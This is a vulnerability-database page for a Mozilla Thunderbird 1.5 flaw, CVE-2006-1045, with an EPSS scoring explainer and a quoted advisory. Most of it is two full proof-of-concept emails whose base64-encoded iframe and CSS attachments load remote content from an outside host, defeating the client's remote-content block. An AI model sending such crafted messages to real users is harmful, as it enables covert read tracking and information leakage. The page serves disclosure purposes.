CVE-2006-1045 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages. Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected. * Iframe Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<[email protected]> To: CrashFr<[email protected]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> </head><body style="margin: 0px; padding: 0px; border: 0px;"> <iframe src="cid:[email protected]" width="100%" height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/html; name="basic.html" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4 OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg== ------=_NextPart_000_0000_DE61E470.78F38016-- * CSS Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<[email protected]> To: CrashFr<[email protected]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> <link rel="stylesheet" type="text/css" href="cid:[email protected]" /></head><body> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/css; name="basic.css" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ== ------=_NextPart_000_0000_DE61E470.78F38016--